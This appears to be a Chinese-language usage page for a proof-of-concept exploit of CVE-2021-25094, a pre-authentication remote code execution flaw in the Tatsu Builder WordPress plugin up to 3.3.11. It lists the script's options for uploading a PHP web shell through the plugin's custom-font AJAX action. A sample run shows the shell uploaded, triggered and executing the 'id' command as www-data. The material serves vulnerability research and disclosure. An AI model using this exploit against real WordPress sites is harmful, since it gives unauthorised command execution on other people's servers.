
Tatsu Builder <= 3.3.11 中未经认证的 RCE 简单 PoC,作为示例提供。
完整分析文章见:https://darkpills.com/wordpress-tatsu-builder-preauth-rce-cve-2021-25094/
Usage:
python3 exploit-rce.py [-h] [--technique TECHNIQUE] [--customShell CUSTOMSHELL] [--keep KEEP] [--proxy PROXY] [--compressionLevel COMPRESSIONLEVEL] url cmd
positional arguments:
url 易受攻击的 WordPress URL(例如:https://mywordpress.com/)
cmd 要执行的 OS 命令
optional arguments:
-h, --help 显示此帮助信息并退出
--technique TECHNIQUE
Shell 技术:php | htaccess | custom
--customShell CUSTOMSHELL
提供自定义 PHP shell 文件,该文件将接收作为 $_POST['text'] 输入的 base64 命令
--keep KEEP 不自动删除上传的 PHP shell
--proxy PROXY 指定并使用 HTTP 代理(例如:http://localhost:8080)
--compressionLevel COMPRESSIONLEVEL
zip 文件的压缩级别(0 到 9,默认为 9)
示例:
└─$ python3 exploit-rce.py http://wordpress/ id
|=== Tatsudo: Tatsu WordPress 插件预认证 RCE 利用工具 <= 3.3.11
|=== CVE-2021-25094 / Vincent MICHEL (@darkpills)
[+] 正在使用 shell 技术 'php' 生成 zip 文件
[+] 正在上传 zip 归档文件到 http://wordpress//wp-admin/admin-ajax.php?action=add_custom_font
[+] 上传成功
[+] 触发 shell 于 http://wordpress/wp-content/uploads/typehub/custom/hjf/.bfzwt.php
[+] 利用成功!
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell 文件已自动删除,但父目录将保留在 Web 服务器上
[+] 完成